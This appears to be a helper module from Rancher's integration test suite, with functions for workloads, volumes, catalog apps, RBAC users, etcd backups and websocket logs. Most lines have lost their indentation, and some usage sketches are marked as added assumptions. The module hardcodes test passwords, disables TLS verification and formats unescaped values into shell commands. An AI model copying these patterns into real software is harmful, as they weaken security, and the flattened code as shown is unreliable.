source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
    if is_windows():
        cmd_write = \
            'powershell -NoLogo -NonInteractive -Command ' \
            '"& {{ echo {1} > {0} }}"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
    if is_windows():
        cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
                          '"& {{ cat {0} }}"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
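# Hedged usage sketch (assumption, not from the original suite): write a marker file
# inside a pod and read it back, e.g. to confirm a mounted volume is writable; the
# path and content below are placeholders.
def _example_volume_write_and_check(pod):
    write_content_to_file(pod, "from-test", "/var/nfs/check.txt")
    validate_file_content(pod, "from-test", "/var/nfs/check.txt")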
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
    First wait for the app to reach the deploying state, then wait for it to
    become active. This avoids wrongly concluding that the app is active too
    early, as the app goes through installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
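# Hedged usage sketch (assumption): after deploying a catalog app, wait out the
# installing > active > deploying > active flapping described above before asserting
# anything about the app; proj_client and app are placeholders from the caller.
def _example_wait_for_app(proj_client, app):
    app = wait_for_app_to_active(proj_client, app.id)
    assert app.state == "active"
    return app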
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
            # If required and no default value is available, set a fake value
            # for enum, password and string types; error out for other types
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
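# Hedged usage sketch (assumption): resolve the default answers for a catalog chart by
# building its external id first; the catalog/template/version values below are
# illustrative placeholders, not values used elsewhere in this module.
def _example_default_answers_for_chart(client):
    external_id = create_catalog_external_id("library", "wordpress", "7.3.8")
    return get_defaut_question_answers(client, external_id)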
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
        app = client.list_app(id=app_id).data
        if len(app) == 0:
            break
        application = app[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
    This method validates that all the deployed workloads are in active state,
    have the correct version, and validates the answers.
    @param proj_client: Project client object of an existing project.
    @param app: Deployed app object.
    @param external_id: Catalog external ID (catalog://... URL) of the app.
    @param answer: Answers the app requires while deploying; body of the POST call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
    assert len(answers.items() - app["answers"].items()) == 0, \
        "Answers are not the same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
    This method finds either the 'chart' label or the
    'helm.sh/chart' label from the workload API
    @param workloadlabels: workload labels object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
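# Hedged usage sketch (assumption): check_condition builds a predicate for
# wait_for_condition (used earlier in this module); the "Ready"/"True" condition
# values below are illustrative placeholders.
def _example_wait_for_ready_condition(client, cluster):
    return wait_for_condition(client, cluster,
                              check_condition("Ready", "True"),
                              lambda x: "State is: " + x.state)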
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(RANCHER_SERVER_URL):
"""Returns a ManagementContext for the default global admin user."""
CATTLE_AUTH_URL = \
RANCHER_SERVER_URL + "/v3-public/localproviders/local?action=login"
r = requests.post(CATTLE_AUTH_URL, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=RANCHER_SERVER_URL + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
client.update(serverurl[0], value=RANCHER_SERVER_URL)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
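# Hedged usage sketch (assumption): a restricted user should be denied catalog creation
# while a privileged token should succeed; the repo URL and branch are placeholders.
def _example_catalog_permission_check(privileged_token, restricted_token):
    url = "https://git.rancher.io/charts"
    validate_create_catalog(restricted_token, random_name(), "master", url,
                            permission=False)
    return validate_create_catalog(privileged_token, random_name(), "master", url,
                                   permission=True)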
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": "80"}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
            assert filename not in response, \
                "The file still exists in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
        while socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
                if len(data) < 5:
                    continue
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
    create a websocket connection and check if it is connected
    :param url: the url to connect to
    :param subprotocols: the list of subprotocols
    :return: the connected websocket
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
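# Hedged usage sketch (assumption): stream a container log over a websocket and collect
# the decoded text; the URL and subprotocol are placeholders, and skip=False assumes the
# frames carry no leading channel byte.
def _example_tail_logs_over_websocket(ws_url):
    socket = create_connection(ws_url, ["base64.binary.k8s.io"])
    logparse = WebsocketLogParse()
    WebsocketLogParse.start_thread(target=logparse.receiver, args=(socket, False))
    time.sleep(5)
    socket.close()
    return logparse.last_message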
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
